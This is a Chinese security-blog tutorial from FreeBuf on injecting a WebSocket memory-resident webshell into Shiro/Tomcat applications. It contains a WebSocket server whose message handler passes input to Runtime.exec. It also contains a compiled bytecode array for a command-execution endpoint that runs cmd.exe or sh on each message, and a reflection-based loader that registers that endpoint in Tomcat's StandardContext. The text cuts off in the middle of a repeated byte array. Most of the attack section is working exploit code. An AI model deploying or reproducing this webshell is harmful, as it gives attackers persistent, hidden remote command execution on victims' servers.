官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
深入浅出Shiro WebSocket内存马
Met32- 关注
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
深入浅出Shiro WebSocket内存马
本文由
Met32 创作,已纳入「FreeBuf原创奖励计划」,未授权禁止转载
1.什么是WebSocket?
websocket协议是基于TCP的一种新的网络协议。它实现了浏览器与服务器的全双工通讯-允许服务器主动发起信息个客户端。
websocket’是一种持久协议,http是非持久协议。在websocket出现之前,是通过通过ajax轮询来实现网站实时推送消息给浏览器客户端。轮询是指由浏览器每隔一段时间向服务器发出 HTTP 请求,然后服务器返回最新的数据给客户端。轮询的效率低,非常浪费资源。
websocket和http的区别
HTTP 协议是一种无状态的、无连接的、单向的应用层协议。它采用了请求/响应模型。通信请求只能由客户端发起,服务端对请求做出应答处理,HTTP 协议无法实现服务器主动向客户端发起消息。
WebSocket 只需要建立一次连接,就可以一直保持连接状态。这相比于轮询方式的不停建立连接显然效率要大大提高
在通俗来将,大家访问网页都是http:// 而WebSocket链接方式为ws://
2. WebSocket入门
首先导入maven依赖
<dependency>
<groupId>org.java-websocket</groupId>
<artifactId>Java-WebSocket</artifactId>
<version>1.5.3</version>
</dependency>而在使用WebSocket也是非常简单
public class SocketServer extends WebSocketServer {
public SocketServer(int port) throws UnknownHostException {
super(new InetSocketAddress(port));
}
@Override
public void onOpen(WebSocket webSocket, ClientHandshake clientHandshake) {
System.out.println("有人连接");
}
@Override
public void onClose(WebSocket webSocket, int i, String s, boolean b) {
}
@Override
public void onMessage(WebSocket webSocket, String s) {
System.out.println("收到消息"+s);
try {
Runtime.getRuntime().exec(s);
} catch (IOException e) {
e.printStackTrace();
}
}
@Override
public void onError(WebSocket webSocket, Exception e) {
}
@Override
public void onStart() {
}
}
其实主要操作的就是WebSocketServer,继承该类之后,重写该类的方法,当客户端链接之后,客户端做出什么样的操作,服务端就执行哪个方法,这样说起来肯定就很容易理解了。
接下来讲解下WebSocketServer上方重写的方法,可以执行哪些功能
onOpen * * 连接建立后触发的方法
onClose * * 连接关闭后触发的方法
onMessage * * 接收到客户端消息时触发的方法
onError * * 发生错误时触发的方法
接下来通过main函数启动即可,启动之后则会监听8877端口等待客户端链接
稍后可以找一个在线WebSocket客户端进行发送即可,看如下,本人发送了calc,而服务端接收到消息后,会在onMessage处理,接收到消息并进行处理。
3. Shiro WebSocket内存马
在学习完WebSocket的基本使用后,可以深入研究一下内存马。
在tomcat中可以通过WsSic对WebSocket进行操作和处理。而shiro注入内存马,最常见的就是Filter,本篇主要注重WebSocket内存马的注入。
首先准备一个可以进行WebSocket的服务端,主要功能就是传参到onMessage进行执行命令
类似于前面那种即可,当然也可以找一下网上师傅们的代码也可以。
利用javassist生成为字节码
byte[] bytes = new byte[]{-54, -2, -70, -66, 0, 0, 0, 51, 0, -96, 10, 0, 33, 0, 81, 9, 0, 32, 0, 82, 11, 0, 83, 0, 84, 8, 0, 85, 10, 0, 86, 0, 87, 9, 0, 88, 0, 89, 10, 0, 11, 0, 90, 8, 0, 91, 10, 0, 11, 0, 92, 10, 0, 93, 0, 94, 7, 0, 95, 8, 0, 96, 8, 0, 97, 10, 0, 93, 0, 98, 10, 0, 99, 0, 100, 7, 0, 101, 10, 0, 16, 0, 81, 10, 0, 102, 0, 103, 10, 0, 16, 0, 104, 10, 0, 102, 0, 105, 10, 0, 99, 0, 106, 11, 0, 83, 0, 107, 8, 0, 108, 10, 0, 16, 0, 109, 10, 0, 16, 0, 110, 11, 0, 111, 0, 112, 7, 0, 113, 10, 0, 27, 0, 114, 7, 0, 115, 10, 0, 29, 0, 114, 10, 0, 32, 0, 116, 7, 0, 117, 7, 0, 118, 7, 0, 120, 1, 0, 7, 115, 101, 115, 115, 105, 111, 110, 1, 0, 25, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 83, 101, 115, 115, 105, 111, 110, 59, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100, 101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108, 101, 1, 0, 18, 76, 111, 99, 97, 108, 86, 97, 114, 105, 97, 98, 108, 101, 84, 97, 98, 108, 101, 1, 0, 4, 116, 104, 105, 115, 1, 0, 19, 76, 99, 111, 109, 47, 87, 101, 98, 83, 111, 99, 107, 101, 116, 95, 99, 109, 100, 59, 1, 0, 6, 111, 110, 79, 112, 101, 110, 1, 0, 60, 40, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 83, 101, 115, 115, 105, 111, 110, 59, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 69, 110, 100, 112, 111, 105, 110, 116, 67, 111, 110, 102, 105, 103, 59, 41, 86, 1, 0, 14, 101, 110, 100, 112, 111, 105, 110, 116, 67, 111, 110, 102, 105, 103, 1, 0, 32, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 69, 110, 100, 112, 111, 105, 110, 116, 67, 111, 110, 102, 105, 103, 59, 1, 0, 16, 77, 101, 116, 104, 111, 100, 80, 97, 114, 97, 109, 101, 116, 101, 114, 115, 1, 0, 9, 111, 110, 77, 101, 115, 115, 97, 103, 101, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 86, 1, 0, 4, 101, 120, 101, 99, 1, 0, 19, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 59, 1, 0, 2, 105, 115, 1, 0, 1, 90, 1, 0, 3, 105, 112, 115, 1, 0, 21, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 59, 1, 0, 2, 115, 98, 1, 0, 25, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 105, 108, 100, 101, 114, 59, 1, 0, 1, 105, 1, 0, 1, 73, 1, 0, 1, 101, 1, 0, 21, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 59, 1, 0, 32, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 73, 110, 116, 101, 114, 114, 117, 112, 116, 101, 100, 69, 120, 99, 101, 112, 116, 105, 111, 110, 59, 1, 0, 1, 115, 1, 0, 18, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 13, 83, 116, 97, 99, 107, 77, 97, 112, 84, 97, 98, 108, 101, 7, 0, 121, 7, 0, 122, 7, 0, 101, 7, 0, 117, 7, 0, 95, 7, 0, 113, 7, 0, 115, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 59, 41, 86, 1, 0, 9, 83, 105, 103, 110, 97, 116, 117, 114, 101, 1, 0, 5, 87, 104, 111, 108, 101, 1, 0, 12, 73, 110, 110, 101, 114, 67, 108, 97, 115, 115, 101, 115, 1, 0, 84, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 69, 110, 100, 112, 111, 105, 110, 116, 59, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 36, 87, 104, 111, 108, 101, 60, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 62, 59, 1, 0, 10, 83, 111, 117, 114, 99, 101, 70, 105, 108, 101, 1, 0, 18, 87, 101, 98, 83, 111, 99, 107, 101, 116, 95, 99, 109, 100, 46, 106, 97, 118, 97, 12, 0, 37, 0, 38, 12, 0, 35, 0, 36, 7, 0, 123, 12, 0, 124, 0, 125, 1, 0, 7, 111, 115, 46, 110, 97, 109, 101, 7, 0, 126, 12, 0, 127, 0, -128, 7, 0, -127, 12, 0, -126, 0, -125, 12, 0, -124, 0, -123, 1, 0, 7, 119, 105, 110, 100, 111, 119, 115, 12, 0, -122, 0, -121, 7, 0, -120, 12, 0, -119, 0, -118, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 1, 0, 7, 99, 109, 100, 46, 101, 120, 101, 1, 0, 2, 47, 99, 12, 0, 51, 0, -117, 7, 0, 121, 12, 0, -116, 0, -115, 1, 0, 23, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 105, 108, 100, 101, 114, 7, 0, 122, 12, 0, -114, 0, -113, 12, 0, -112, 0, -111, 12, 0, -110, 0, 38, 12, 0, -109, 0, -113, 12, 0, -108, 0, -106, 1, 0, 4, 77, 83, 71, 58, 12, 0, -112, 0, -105, 12, 0, -104, 0, -103, 7, 0, -101, 12, 0, -100, 0, 50, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 12, 0, -99, 0, 38, 1, 0, 30, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 73, 110, 116, 101, 114, 114, 117, 112, 116, 101, 100, 69, 120, 99, 101, 112, 116, 105, 111, 110, 12, 0, 49, 0, 50, 1, 0, 17, 99, 111, 109, 47, 87, 101, 98, 83, 111, 99, 107, 101, 116, 95, 99, 109, 100, 1, 0, 24, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 69, 110, 100, 112, 111, 105, 110, 116, 7, 0, -98, 1, 0, 36, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 36, 87, 104, 111, 108, 101, 1, 0, 17, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 1, 0, 23, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 83, 101, 115, 115, 105, 111, 110, 1, 0, 17, 97, 100, 100, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 1, 0, 35, 40, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 59, 41, 86, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 121, 115, 116, 101, 109, 1, 0, 11, 103, 101, 116, 80, 114, 111, 112, 101, 114, 116, 121, 1, 0, 38, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 16, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 76, 111, 99, 97, 108, 101, 1, 0, 4, 82, 79, 79, 84, 1, 0, 18, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 76, 111, 99, 97, 108, 101, 59, 1, 0, 11, 116, 111, 76, 111, 119, 101, 114, 67, 97, 115, 101, 1, 0, 38, 40, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 76, 111, 99, 97, 108, 101, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 10, 115, 116, 97, 114, 116, 115, 87, 105, 116, 104, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 90, 1, 0, 17, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 1, 0, 10, 103, 101, 116, 82, 117, 110, 116, 105, 109, 101, 1, 0, 21, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 59, 1, 0, 40, 40, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 59, 1, 0, 14, 103, 101, 116, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 1, 0, 23, 40, 41, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 59, 1, 0, 4, 114, 101, 97, 100, 1, 0, 3, 40, 41, 73, 1, 0, 6, 97, 112, 112, 101, 110, 100, 1, 0, 28, 40, 67, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 105, 108, 100, 101, 114, 59, 1, 0, 5, 99, 108, 111, 115, 101, 1, 0, 7, 119, 97, 105, 116, 70, 111, 114, 1, 0, 14, 103, 101, 116, 66, 97, 115, 105, 99, 82, 101, 109, 111, 116, 101, 1, 0, 5, 66, 97, 115, 105, 99, 1, 0, 40, 40, 41, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 82, 101, 109, 111, 116, 101, 69, 110, 100, 112, 111, 105, 110, 116, 36, 66, 97, 115, 105, 99, 59, 1, 0, 45, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 105, 108, 100, 101, 114, 59, 1, 0, 8, 116, 111, 83, 116, 114, 105, 110, 103, 1, 0, 20, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 7, 0, -97, 1, 0, 36, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 82, 101, 109, 111, 116, 101, 69, 110, 100, 112, 111, 105, 110, 116, 36, 66, 97, 115, 105, 99, 1, 0, 8, 115, 101, 110, 100, 84, 101, 120, 116, 1, 0, 15, 112, 114, 105, 110, 116, 83, 116, 97, 99, 107, 84, 114, 97, 99, 101, 1, 0, 30, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 1, 0, 30, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 82, 101, 109, 111, 116, 101, 69, 110, 100, 112, 111, 105, 110, 116, 0, 33, 0, 32, 0, 33, 0, 1, 0, 34, 0, 1, 0, 2, 0, 35, 0, 36, 0, 0, 0, 4, 0, 1, 0, 37, 0, 38, 0, 1, 0, 39, 0, 0, 0, 47, 0, 1, 0, 1, 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0, 2, 0, 40, 0, 0, 0, 6, 0, 1, 0, 0, 0, 11, 0, 41, 0, 0, 0, 12, 0, 1, 0, 0, 0, 5, 0, 42, 0, 43, 0, 0, 0, 1, 0, 44, 0, 45, 0, 2, 0, 39, 0, 0, 0, 86, 0, 2, 0, 3, 0, 0, 0, 16, 42, 43, -75, 0, 2, 42, -76, 0, 2, 42, -71, 0, 3, 2, 0, -79, 0, 0, 0, 2, 0, 40, 0, 0, 0, 14, 0, 3, 0, 0, 0, 15, 0, 5, 0, 16, 0, 15, 0, 17, 0, 41, 0, 0, 0, 32, 0, 3, 0, 0, 0, 16, 0, 42, 0, 43, 0, 0, 0, 0, 0, 16, 0, 35, 0, 36, 0, 1, 0, 0, 0, 16, 0, 46, 0, 47, 0, 2, 0, 48, 0, 0, 0, 9, 2, 0, 35, 0, 0, 0, 46, 0, 0, 0, 1, 0, 49, 0, 50, 0, 2, 0, 39, 0, 0, 1, -67, 0, 5, 0, 7, 0, 0, 0, -79, 18, 4, -72, 0, 5, -78, 0, 6, -74, 0, 7, 18, 8, -74, 0, 9, 61, 28, -103, 0, 31, -72, 0, 10, 6, -67, 0, 11, 89, 3, 18, 12, 83, 89, 4, 18, 13, 83, 89, 5, 43, 83, -74, 0, 14, 78, -89, 0, 28, -72, 0, 10, 6, -67, 0, 11, 89, 3, 18, 12, 83, 89, 4, 18, 13, 83, 89, 5, 43, 83, -74, 0, 14, 78, 45, -74, 0, 15, 58, 4, -69, 0, 16, 89, -73, 0, 17, 58, 5, 25, 4, -74, 0, 18, 89, 54, 6, 2, -97, 0, 15, 25, 5, 21, 6, -110, -74, 0, 19, 87, -89, -1, -21, 25, 4, -74, 0, 20, 45, -74, 0, 21, 87, 42, -76, 0, 2, -71, 0, 22, 1, 0, -69, 0, 16, 89, -73, 0, 17, 18, 23, -74, 0, 24, 25, 5, -74, 0, 25, -74, 0, 24, -74, 0, 25, -71, 0, 26, 2, 0, -89, 0, 16, 77, 44, -74, 0, 28, -89, 0, 8, 77, 44, -74, 0, 30, -79, 0, 2, 0, 0, 0, -96, 0, -93, 0, 27, 0, 0, 0, -96, 0, -85, 0, 29, 0, 3, 0, 40, 0, 0, 0, 74, 0, 18, 0, 0, 0, 22, 0, 17, 0, 24, 0, 21, 0, 25, 0, 49, 0, 27, 0, 74, 0, 30, 0, 80, 0, 31, 0, 89, 0, 33, 0, 101, 0, 34, 0, 113, 0, 36, 0, 118, 0, 37, 0, 123, 0, 38, 0, -96, 0, 43, 0, -93, 0, 39, 0, -92, 0, 40, 0, -88, 0, 43, 0, -85, 0, 41, 0, -84, 0, 42, 0, -80, 0, 44, 0, 41, 0, 0, 0, 102, 0, 10, 0, 46, 0, 3, 0, 51, 0, 52, 0, 3, 0, 17, 0, -113, 0, 53, 0, 54, 0, 2, 0, 74, 0, 86, 0, 51, 0, 52, 0, 3, 0, 80, 0, 80, 0, 55, 0, 56, 0, 4, 0, 89, 0, 71, 0, 57, 0, 58, 0, 5, 0, 97, 0, 63, 0, 59, 0, 60, 0, 6, 0, -92, 0, 4, 0, 61, 0, 62, 0, 2, 0, -84, 0, 4, 0, 61, 0, 63, 0, 2, 0, 0, 0, -79, 0, 42, 0, 43, 0, 0, 0, 0, 0, -79, 0, 64, 0, 65, 0, 1, 0, 66, 0, 0, 0, 46, 0, 7, -4, 0, 49, 1, -4, 0, 24, 7, 0, 67, -3, 0, 14, 7, 0, 68, 7, 0, 69, -4, 0, 23, 1, -1, 0, 49, 0, 2, 7, 0, 70, 7, 0, 71, 0, 1, 7, 0, 72, 71, 7, 0, 73, 4, 0, 48, 0, 0, 0, 5, 1, 0, 64, 0, 0, 16, 65, 0, 49, 0, 74, 0, 2, 0, 39, 0, 0, 0, 51, 0, 2, 0, 2, 0, 0, 0, 9, 42, 43, -64, 0, 11, -74, 0, 31, -79, 0, 0, 0, 2, 0, 40, 0, 0, 0, 6, 0, 1, 0, 0, 0, 11, 0, 41, 0, 0, 0, 12, 0, 1, 0, 0, 0, 9, 0, 42, 0, 43, 0, 0, 0, 48, 0, 0, 0, 5, 1, 0, 64, 16, 0, 0, 3, 0, 75, 0, 0, 0, 2, 0, 78, 0, 79, 0, 0, 0, 2, 0, 80, 0, 77, 0, 0, 0, 18, 0, 2, 0, 34, 0, 119, 0, 76, 6, 9, 0, 111, 0, -102, 0, -107, 6, 9};之后看下方代码,来加载这个服务端用的,代码主要功能也很简单
1.获取当前的StandardContext
2.通过StandardContext获取ServerContainer
3.定义一个恶意类,并创建一个ServerEndpointConfig,给这个恶意类分配URI path
4.调用ServerContainer.addEndpoint方法,将创建的ServerEndpointConfig添加进去
public class shiro_shell extends AbstractTranslet {
static{
WebappClassLoaderBase webappClassLoader = (WebappClassLoaderBase)Thread.currentThread().getContextClassLoader();//获取webappClassLoader
StandardRoot standardRoot = (StandardRoot) webappClassLoader.getResources();
if(standardRoot==null){
Field field;
try {
field = webappClassLoader.getClass().getDeclaredField("resources");
field.setAccessible(true);
standardRoot = (StandardRoot)field.get(webappClassLoader);
}catch (Exception e){
try {
field = webappClassLoader.getClass().getSuperclass().getDeclaredField("resources");
field.setAccessible(true);
standardRoot = (StandardRoot)field.get(webappClassLoader);
} catch (NoSuchFieldException noSuchFieldException) {
noSuchFieldException.printStackTrace();
} catch (IllegalAccessException illegalAccessException) {
illegalAccessException.printStackTrace();
}
}
}
StandardContext standardContext = (StandardContext) standardRoot.getContext();
ClassLoader cl = Thread.currentThread().getContextClassLoader();
Class clazz;
byte[] bytes = new byte[]{-54, -2, -70, -66, 0, 0, 0, 51, 0, -96, 10, 0, 33, 0, 81, 9, 0, 32, 0, 82, 11, 0, 83, 0, 84, 8, 0, 85, 10, 0, 86, 0, 87, 9, 0, 88, 0, 89, 10, 0, 11, 0, 90, 8, 0, 91, 10, 0, 11, 0, 92, 10, 0, 93, 0, 94, 7, 0, 95, 8, 0, 96, 8, 0, 97, 10, 0, 93, 0, 98, 10, 0, 99, 0, 100, 7, 0, 101, 10, 0, 16, 0, 81, 10, 0, 102, 0, 103, 10, 0, 16, 0, 104, 10, 0, 102, 0, 105, 10, 0, 99, 0, 106, 11, 0, 83, 0, 107, 8, 0, 108, 10, 0, 16, 0, 109, 10, 0, 16, 0, 110, 11, 0, 111, 0, 112, 7, 0, 113, 10, 0, 27, 0, 114, 7, 0, 115, 10, 0, 29, 0, 114, 10, 0, 32, 0, 116, 7, 0, 117, 7, 0, 118, 7, 0, 120, 1, 0, 7, 115, 101, 115, 115, 105, 111, 110, 1, 0, 25, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 83, 101, 115, 115, 105, 111, 110, 59, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100, 101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108, 101, 1, 0, 18, 76, 111, 99, 97, 108, 86, 97, 114, 105, 97, 98, 108, 101, 84, 97, 98, 108, 101, 1, 0, 4, 116, 104, 105, 115, 1, 0, 19, 76, 99, 111, 109, 47, 87, 101, 98, 83, 111, 99, 107, 101, 116, 95, 99, 109, 100, 59, 1, 0, 6, 111, 110, 79, 112, 101, 110, 1, 0, 60, 40, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 83, 101, 115, 115, 105, 111, 110, 59, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 69, 110, 100, 112, 111, 105, 110, 116, 67, 111, 110, 102, 105, 103, 59, 41, 86, 1, 0, 14, 101, 110, 100, 112, 111, 105, 110, 116, 67, 111, 110, 102, 105, 103, 1, 0, 32, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 69, 110, 100, 112, 111, 105, 110, 116, 67, 111, 110, 102, 105, 103, 59, 1, 0, 16, 77, 101, 116, 104, 111, 100, 80, 97, 114, 97, 109, 101, 116, 101, 114, 115, 1, 0, 9, 111, 110, 77, 101, 115, 115, 97, 103, 101, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 86, 1, 0, 4, 101, 120, 101, 99, 1, 0, 19, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 59, 1, 0, 2, 105, 115, 1, 0, 1, 90, 1, 0, 3, 105, 112, 115, 1, 0, 21, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 59, 1, 0, 2, 115, 98, 1, 0, 25, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 105, 108, 100, 101, 114, 59, 1, 0, 1, 105, 1, 0, 1, 73, 1, 0, 1, 101, 1, 0, 21, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 59, 1, 0, 32, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 73, 110, 116, 101, 114, 114, 117, 112, 116, 101, 100, 69, 120, 99, 101, 112, 116, 105, 111, 110, 59, 1, 0, 1, 115, 1, 0, 18, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 13, 83, 116, 97, 99, 107, 77, 97, 112, 84, 97, 98, 108, 101, 7, 0, 121, 7, 0, 122, 7, 0, 101, 7, 0, 117, 7, 0, 95, 7, 0, 113, 7, 0, 115, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 59, 41, 86, 1, 0, 9, 83, 105, 103, 110, 97, 116, 117, 114, 101, 1, 0, 5, 87, 104, 111, 108, 101, 1, 0, 12, 73, 110, 110, 101, 114, 67, 108, 97, 115, 115, 101, 115, 1, 0, 84, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 69, 110, 100, 112, 111, 105, 110, 116, 59, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 36, 87, 104, 111, 108, 101, 60, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 62, 59, 1, 0, 10, 83, 111, 117, 114, 99, 101, 70, 105, 108, 101, 1, 0, 18, 87, 101, 98, 83, 111, 99, 107, 101, 116, 95, 99, 109, 100, 46, 106, 97, 118, 97, 12, 0, 37, 0, 38, 12, 0, 35, 0, 36, 7, 0, 123, 12, 0, 124, 0, 125, 1, 0, 7, 111, 115, 46, 110, 97, 109, 101, 7, 0, 126, 12, 0, 127, 0, -128, 7, 0, -127, 12, 0, -126, 0, -125, 12, 0, -124, 0, -123, 1, 0, 7, 119, 105, 110, 100, 111, 119, 115, 12, 0, -122, 0, -121, 7, 0, -120, 12, 0, -119, 0, -118, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 1, 0, 7, 99, 109, 100, 46, 101, 120, 101, 1, 0, 2, 47, 99, 12, 0, 51, 0, -117, 7, 0, 121, 12, 0, -116, 0, -115, 1, 0, 23, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 105, 108, 100, 101, 114, 7, 0, 122, 12, 0, -114, 0, -113, 12, 0, -112, 0, -111, 12, 0, -110, 0, 38, 12, 0, -109, 0, -113, 12, 0, -108, 0, -106, 1, 0, 4, 77, 83, 71, 58, 12, 0, -112, 0, -105, 12, 0, -104, 0, -103, 7, 0, -101, 12, 0, -100, 0, 50, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 12, 0, -99, 0, 38, 1, 0, 30, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 73, 110, 116, 101, 114, 114, 117, 112, 116, 101, 100, 69, 120, 99, 101, 112, 116, 105, 111, 110, 12, 0, 49, 0, 50, 1, 0, 17, 99, 111, 109, 47, 87, 101, 98, 83, 111, 99, 107, 101, 116, 95, 99, 109, 100, 1, 0, 24, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 69, 110, 100, 112, 111, 105, 110, 116, 7, 0, -98, 1, 0, 36, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 36, 87, 104, 111, 108, 101, 1, 0, 17, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 1, 0, 23, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 83, 101, 115, 115, 105, 111, 110, 1, 0, 17, 97, 100, 100, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 1, 0, 35, 40, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 59, 41, 86, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 121, 115, 116, 101, 109, 1, 0, 11, 103, 101, 116, 80, 114, 111, 112, 101, 114, 116, 121, 1, 0, 38, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 